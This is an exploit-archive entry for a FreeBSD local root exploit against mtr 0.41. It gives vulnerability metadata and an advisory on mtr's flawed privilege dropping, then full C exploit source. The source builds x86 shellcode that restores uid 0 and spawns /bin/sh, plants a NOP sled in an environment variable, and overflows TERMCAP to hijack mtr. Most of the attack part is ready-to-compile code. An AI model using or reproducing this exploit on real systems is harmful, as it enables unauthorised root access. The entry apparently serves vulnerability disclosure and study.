FreeBSD mtr-0.41 Local Root Exploit

vendor:

mtr

by:

babcia padlina / buffer0verfl0w security

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: mtr

Affected Version From: 0.41

Affected Version To: 0.42

Patch Exists: YES

Related CWE: N/A

CPE: a:matt_kimball:mtr

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix

2000

FreeBSD mtr-0.41 Local Root Exploit

A potential vulnerability exists in the 'mtr' program, by Matt Kimball and Roger Wolff. Versions prior to 0.42 incorrectly dropped privileges on all Unix variants except HPUX. By calling a seteuid(getuid()) call, the authors hoped to drop permissions to prevent the obtaining of root privilege should there be potential vulnerabilities in mtr or a library it depends on. However, due to saved uid semantics, the uid of 0 can be recovered simply by doing a setuid(0). An attacker would only need to find an overflow in one of the libraries mtr uses, such as gtk or curses. In patched versions, the seteuid() call has been changed to setuid(). This will eliminate this potential problem.

Mitigation:

Upgrade to the latest version of mtr

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1038/info

A potential vulnerability exists in the 'mtr' program, by Matt Kimball and Roger Wolff. Versions prior to 0.42 incorrectly dropped privileges on all Unix variants except HPUX. By calling a seteuid(getuid()) call, the authors hoped to drop permissions to prevent the obtaining of root privilege should there be potential vulnerabilities in mtr or a library it depends on. However, due to saved uid semantics, the uid of 0 can be recovered simply by doing a setuid(0). An attacker would only need to find an overflow in one of the libraries mtr uses, such as gtk or curses. In patched versions, the seteuid() call has been changed to setuid(). This will eliminate this potential problem.

/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
/* freebsd mtr-0.41 local root exploit */

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h> 
#include <string.h>   

#define NOP             0x90
#define BUFSIZE         10000
#define ADDRS           1200 

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc; 
char **argv;
{
        char *execshell =
        //seteuid(0);
        "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
        //setuid(0);
        "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
        //execl("/bin/sh", "sh", 0);
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        char buf[BUFSIZE+ADDRS+1], *p;
        int noplen, i, ofs;
        long ret, *ap;
   
        if (argc < 2) { fprintf(stderr, "usage: %s ofs\n", argv[0]); exit(0); }

        ofs = atoi(argv[1]);

        noplen = BUFSIZE - strlen(execshell);
        ret = getesp() + ofs;
        
        memset(buf, NOP, noplen);
        buf[noplen+1] = '\0';
        strcat(buf, execshell);
        
        setenv("EGG", buf, 1);
        
        p = buf;
        ap = (unsigned long *)p;
        
        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;
        
        p = (char *)ap;
        *p = '\0';
        
        fprintf(stderr, "ret: 0x%x\n", ret);
        
        setenv("TERMCAP", buf, 1);
        execl("/usr/local/sbin/mtr", "mtr", 0);
        
        return 0;
}